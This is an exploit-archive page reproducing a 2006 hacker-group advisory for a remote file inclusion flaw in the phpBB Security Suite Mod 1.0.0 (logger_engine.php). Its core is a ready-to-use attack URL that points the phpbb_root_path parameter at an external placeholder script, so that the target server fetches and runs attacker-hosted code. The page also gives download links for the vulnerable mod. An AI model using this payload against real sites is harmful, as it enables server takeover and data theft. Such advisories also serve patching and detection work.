phpBB Security Suite Mod 1.0.0 (logger_engine.php) Remote File Include

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : phpBB Security Suite Mod 1.0.0 (logger_engine.php) Remote File Include
# Published : 2006-10-05
# Author : SpiderZ
# Previous Title : phpMyTeam <= 2.0 (smileys_dir) Remote File Include Vulnerability
# Next Title : Dimension of phpBB <= 0.2.6 (phpbb_root_path) Remote File Includes

/      
            ,,  /  /
         '-.`()/`.-'
        .--_'(  )'_--.
       / /` /`""` `            * SpiderZ Hacking Security *
        |  |  ><  |  |
                /  /
            '.__.'


# Author: SpiderZ
# Security Suite IP Logger Remote File Inclusion Vulnerability
# For: phpBB ( 2.0.x - 2.0.21 )
# Site: www.spiderz.altervista.org
# Site02: www.spiderz.netsons.org
_________________________________________________________________________


# Remote File Inclusion - Security Suite IP Logger



http://site.com/[path]/includes/logger_engine.php?phpbb_root_path=http://[Evil_script]



-------------------------------------------------------------------------

# Download: http://www.phpbb.de/viewtopic.php?t=30261

# Download2: http://prdownload.berlios.de/dwingmods/logger_mod100.zip

-------------------------------------------------------------------------

# www.Syue.com [2006-10-05]